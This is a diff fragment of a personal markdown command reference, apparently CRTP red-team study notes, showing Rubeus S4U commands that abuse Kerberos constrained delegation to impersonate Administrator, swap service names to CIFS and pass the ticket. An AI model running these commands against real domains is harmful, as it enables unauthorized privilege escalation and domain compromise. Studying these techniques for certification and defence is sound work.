conma293/CRTP/#Commands Ref.md

 There is also a possiblity of requesting a TGS for more services than is specified in {msDS-AllowedToDelegateTo} IF there is no SNAME validation:

 ```
 Rubeus.exe s4u /ticket:adminsrv$_LOCALxxx.kirbi /impersonateuser:Administrator /domain:ecorp.lab /msdsspn:cifs/dc01.ecorp.lab|ldap/dc01.ecorp.lab
 ```

-**NOTE:** You then save both to disk or output-String, and import the one you want to impersonate i.e., LDAP OR inject straight into memory the altservice-
+**NOTE:** You then save both to disk or output-String, and import the one you want to impersonate i.e., LDAP OR inject straight into memory the altservice

+**NOTE:** This will ONLY work if the msdspn service FQDN is able to be used by both i.e., NOT ending in a port e.g., ```CE01/SQLDatabase.ecorp.lab:1337``` - this will NOT work!
 ```
-.\Rubeus.exe s4u /ticket:doIE+jCCBPag... /impersonateuser:administrator /msdsspn:mssqlsvc/cdc01.prod.corp1.com:1433 /altservice:CIFS /ptt
+.\Rubeus.exe s4u /ticket:doIE+jCCBPag... /impersonateuser:administrator /msdsspn:mssqlsvc/dc01.ecorp.com /altservice:CIFS /ptt
 ```

 * * *

 Inject PTT: